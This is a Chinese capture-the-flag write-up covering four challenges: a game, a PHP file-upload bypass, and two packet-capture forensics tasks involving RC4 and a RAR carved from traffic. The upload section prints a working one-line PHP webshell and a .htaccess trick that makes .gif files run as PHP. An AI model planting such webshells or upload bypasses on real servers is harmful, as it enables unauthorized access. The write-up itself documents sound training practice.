还是太菜了,要经常练了
1.BrickGame
通过游戏就可以得到flag
2.SQLUP
一道文件上传的题目,在登陆页面我用admin和1登陆成功了,但是按照正常的应该是要爆破,用bp爆破得到下面的页面
登陆成功后,点击头像就可以进行文件上传,先上传一个php文件发现它限制带p的文件。
那就我想到了.htaccess文件和.user.ini文件,我使用的.htaccess文件,文件内容如下
AddType application/X-httped-php .gif
然后在上传一个1.gif文件,gif文件内容就是一句话木马
<?php @eval($_POST[1]);?>
然后访问url+uploads/gif文件名
探针测试了一下发现上传成功了
之后连接蚁剑,直接cat flag不行,需要提权,提权命令如下
tac -s 'RANDOM' "/flag"
得到flag
3.漏洞探测,流量解密
下载附件打开,发现有两个阶段,第二阶段的压缩包密码是第一阶段的攻击ip;
先在第一阶段找攻击ip,
我们可以看到木马文件为gateway.php
然后在日志中可以看到上传gateway.php的主机ip地址为192.168.30.234
因此压缩包密码为192.168.30.234
打开压缩包,还是一个流量文件,用wireshark打开,导出http流,查看其中gateway.php文件中执行的命令和回显。
在某一个文件中找到了提示,加密方式是RC4
在剩余文件中找到了key和raw,即秘钥和密文
把raw前面的key删了用rc4解密就得到flag了
4.最安全的加密方式
下载附件打开,用Wireshark打开流量,点击左上角文件里的导出对象里的http,将里面的文件全部导出
将每个文件依次使用记事本打开,发现index(3).php和index(6).php文件里的内容与其他不同,打开index(6).php发现rar头
然后进入wireshark将将它进行原始数据进行转换,转换之后将红色部分的原始数据在010中创建一个16进制文件如何将红色部分的在010中按crl+shift+v复制下来将多余的数据删掉,前面找到rar部分,最前面都删掉,后面的---的全部删掉,得到一个压缩包,需要密码,在另一个文件中找到密码
25ming
打开压缩包中的文档,发现有一堆md5数据,逐行解密md5即可得到flag